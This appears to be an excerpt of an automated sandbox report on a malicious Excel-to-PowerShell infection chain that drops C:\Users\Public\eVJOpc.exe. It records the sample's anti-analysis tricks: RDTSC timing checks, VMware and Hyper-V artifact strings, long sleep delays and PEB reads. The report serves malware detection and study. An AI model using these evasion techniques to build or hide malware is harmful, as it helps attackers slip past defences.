            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\eVJOpc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\eVJOpc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\eVJOpc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000009B8614 second address: 00000000009B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000009B89AE second address: 00000000009B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004088E0 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2440
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2440
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00405E93 FindFirstFileA,FindClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00402671 FindFirstFileA,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 0000000A.00000000.405345542.000000000EF44000.00000004.00000001.sdmpBinary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI.3
            Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000002.560332764.000000000089A000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
            Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpBinary or memory string: ,f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: powershell.exe, 00000001.00000002.365400070.00000000080D2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_10007AC0 tgisdk,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004088E0 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B40A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B61E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B74C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B6CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B458EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C02073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C11074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C14015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C14015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B60050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B60050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BD41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h]
